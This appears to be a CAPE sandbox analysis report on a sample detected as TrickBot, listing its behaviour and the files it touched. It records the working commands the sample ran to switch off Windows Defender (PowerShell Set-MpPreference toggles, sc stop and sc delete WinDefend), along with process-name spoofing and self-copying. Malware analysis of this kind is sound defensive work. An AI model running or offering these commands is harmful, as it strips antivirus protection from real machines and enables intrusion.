command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
command: cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true
command: powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: powershell Set-MpPreference -DisableIOAVProtection $true
command: powershell Set-MpPreference -DisablePrivacyMode $true
command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: powershell Set-MpPreference -SevereThreatDefaultAction 6
command: powershell Set-MpPreference -LowThreatDefaultAction 6
command: powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: powershell Set-MpPreference -DisableScriptScanning $true
Uses Windows utilities for basic functionality
command: "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
command: "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
command: cmd.exe /c sc stop WinDefend
command: cmd.exe /c sc stop WinDefend
command: "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
command: "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
command: cmd.exe /c sc delete WinDefend
command: cmd.exe /c sc delete WinDefend
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
command: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
command: cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableScriptScanning $true
command: cmd.exe /c powershell Set-MpPreference -DisableScriptScanning $true
command: sc stop WinDefend
command: sc delete WinDefend
Attempts to stop active services
servicename: WinDefend
Spoofs its process name and/or associated pathname to appear as a legitimate process
original_path: C:\Windows\system32\svchost.exe
original_name: svchost.exe
modified_name: svchost.exe
modified_path: C:\ProgramData\\xd1\x80\xd0\xbe\xd0\xbf\xd1\x80\xd0\xa3\xd0\x92\xd0\xb0\xd0\xab\xd1\x81\xd0\xb5\xd0\xbd\xd0\xbe\xd1\x80\xd1\x85.exe
Creates a hidden or system file
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f3f1.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4f317.TMP
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf289c9.TMP
CAPE detected the TrickBot malware family
Creates a copy of itself
copy: C:\ProgramData\\xd1\x80\xd0\xbe\xd0\xbf\xd1\x80\xd0\xa3\xd0\x92\xd0\xb0\xd0\xab\xd1\x81\xd0\xb5\xd0\xbd\xd0\xbe\xd1\x80\xd1\x85.exe
Attempts to disable Windows Defender

Screenshots


Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

C:\Users\user\AppData\Local\Temp\exlxo5YyAuKqn.exe
C:\ProgramData\\xd1\x80\xd0\xbe\xd0\xbf\xd1\x80\xd0\xa3\xd0\x92\xd0\xb0\xd0\xab\xd1\x81\xd0\xb5\xd0\xbd\xd0\xbe\xd1\x80\xd1\x85.exe
\??\MountPointManager
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Crypto
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-120665959-548228820-2376508522-1001
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-120665959-548228820-2376508522-1001\f58155b4b1d5a524ca0261c3ee99fb50_fb20aa52-1ec9-4d1f-b923-f6709499e604
C:\Users\user\AppData\Local\Temp
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp\sc.*
C:\Users\user\AppData\Local\Temp\sc
C:\Windows\sysnative\sc.*
C:\Windows\sysnative\sc.COM
C:\Windows\sysnative\sc.exe
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\powershell.*
C:\Users\user\AppData\Local\Temp\powershell
C:\Windows\sysnative\powershell.*
C:\Windows\sysnative\powershell
C:\Windows\powershell.*
C:\Windows\powershell
C:\Windows\sysnative\wbem\powershell.*
C:\Windows\sysnative\wbem\powershell
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.*
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.COM
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\sysnative\en-US\sc.exe.mui
C:\Windows\sysnative\en-US\KERNELBASE.dll.mui
\Device\KsecDD
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell\v1.0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\Desktop\desktop.ini
::\
::\{2559A1F3-21D7-11D4-BDAF-00C04F60B9F0}
::\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
::\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
::\{2559A1F1-21D7-11D4-BDAF-00C04F60B9F0}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
::\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\Desktop
C:\Users\Public\Desktop
C:\Users\Public
C:\Users\Public\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\DosDevices\pipe\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\
C:\Windows\sysnative\windowspowershell\v1.0\powershell_ise.exe
C:\Windows\sysnative\windowspowershell
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell_ise.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\
C:\Windows\hh.exe
C:\Windows\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00R5Q3FLPU2BRO922T83.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e532.TMP
C:\Windows\sysnative\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\*
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.config
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.Local\
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ole32.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\OLEAUT32.dll
C:\Windows\Globalization\en-gb.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.config
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI
C:\Windows\Globalization\en.nlp
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI
C:\Windows\assembly\GAC_64\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\assembly\GAC_64\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.exe
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.exe
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\profile.ps1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
C:\Users\user\Documents\WindowsPowerShell\profile.ps1
C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
C:\Windows\sysnative\Set-MpPreference.ps1
C:\Windows\sysnative\Set-MpPreference.psm1
C:\Windows\sysnative\Set-MpPreference.psd1
C:\Windows\sysnative\Set-MpPreference.COM
C:\Windows\sysnative\Set-MpPreference.EXE
C:\Windows\sysnative\Set-MpPreference.BAT
C:\Windows\sysnative\Set-MpPreference.CMD
C:\Windows\sysnative\Set-MpPreference.VBS
C:\Windows\sysnative\Set-MpPreference.VBE
C:\Windows\sysnative\Set-MpPreference.JS
C:\Windows\sysnative\Set-MpPreference.JSE
C:\Windows\sysnative\Set-MpPreference.WSF
C:\Windows\sysnative\Set-MpPreference.WSH
C:\Windows\sysnative\Set-MpPreference.MSC
C:\Windows\sysnative\Set-MpPreference
C:\Windows\Set-MpPreference.ps1
C:\Windows\Set-MpPreference.psm1
C:\Windows\Set-MpPreference.psd1
C:\Windows\Set-MpPreference.COM
C:\Windows\Set-MpPreference.EXE
C:\Windows\Set-MpPreference.BAT
C:\Windows\Set-MpPreference.CMD
C:\Windows\Set-MpPreference.VBS
C:\Windows\Set-MpPreference.VBE
C:\Windows\Set-MpPreference.JS
C:\Windows\Set-MpPreference.JSE
C:\Windows\Set-MpPreference.WSF
C:\Windows\Set-MpPreference.WSH
C:\Windows\Set-MpPreference.MSC
C:\Windows\Set-MpPreference
C:\Windows\sysnative\wbem\Set-MpPreference.ps1
C:\Windows\sysnative\wbem\Set-MpPreference.psm1
C:\Windows\sysnative\wbem\Set-MpPreference.psd1
C:\Windows\sysnative\wbem\Set-MpPreference.COM
C:\Windows\sysnative\wbem\Set-MpPreference.EXE
C:\Windows\sysnative\wbem\Set-MpPreference.BAT
C:\Windows\sysnative\wbem\Set-MpPreference.CMD
C:\Windows\sysnative\wbem\Set-MpPreference.VBS
C:\Windows\sysnative\wbem\Set-MpPreference.VBE
C:\Windows\sysnative\wbem\Set-MpPreference.JS
C:\Windows\sysnative\wbem\Set-MpPreference.JSE
C:\Windows\sysnative\wbem\Set-MpPreference.WSF
C:\Windows\sysnative\wbem\Set-MpPreference.WSH
C:\Windows\sysnative\wbem\Set-MpPreference.MSC
C:\Windows\sysnative\wbem\Set-MpPreference
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.ps1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.psm1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.psd1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.COM
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.EXE
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.BAT
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.CMD
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.VBS
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.VBE
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.JS
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.JSE
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.WSF
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.WSH
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference.MSC
C:\Windows\sysnative\WindowsPowerShell\v1.0\Set-MpPreference
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2952.15001147
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2952.15001147
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2952.15001147
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQQ8PD6SYDSTEQFLYPJ7.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4e8ab.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1628.15001881
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1628.15001896
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1628.15001896
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7K5UWNQAAA284NII014E.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.624.15891007
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.624.15891007
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.624.15891007
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5ZNGV2JSA4OCNZIV8RKJ.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.2056.15001974
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.2056.15001974
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.2056.15001974
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDMN0LR05DQCP1U000ZS.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.3004.15002941
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.3004.15002941
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.3004.15002941
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DY63D6T0HFBA1VQSZOV0.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFe4ed4d.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.1964.15003051
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.1964.15003051
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.1964.15003066
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0F89DDCRI5G2QC12KTBO.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf28611.TMP
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.920.15894096
